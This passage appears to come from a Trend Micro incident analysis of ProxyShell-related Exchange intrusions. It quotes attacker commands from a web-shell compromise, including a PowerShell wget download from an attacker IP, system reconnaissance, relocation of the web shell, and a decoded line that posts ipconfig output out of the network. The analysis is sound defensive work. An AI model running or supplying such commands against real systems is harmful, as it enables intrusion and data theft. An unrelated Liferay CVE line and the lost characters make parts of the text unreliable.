Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Trend Micro -

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.

“C:WindowsSystem32cmd.exe” /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

cmd.exe /c ipconfig cmd.exe /c dir “c:windowssystem32cmd.exe” /c ping -n 1 “c:windowssystem32cmd.exe” /c whoami

The web shell was then copied and the original entry deleted using the following commands:

cmd.exe /c ren C:inetpubwwwrootaspnet_clienterrorFF.aspx.req errorFF.aspx “c:windowssystem32cmd.exe” /c del “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaautherrorFF.aspx.req”

The ipconfig command was executed as an argument for a wget request.

The following code shows the Powershell-encoded (top) and decoded (bottom) commands:


$r=ipconfig /all | out-string;wget -Uri -Method Post -Body $r -ContentType “application/octet-stream”


Read More: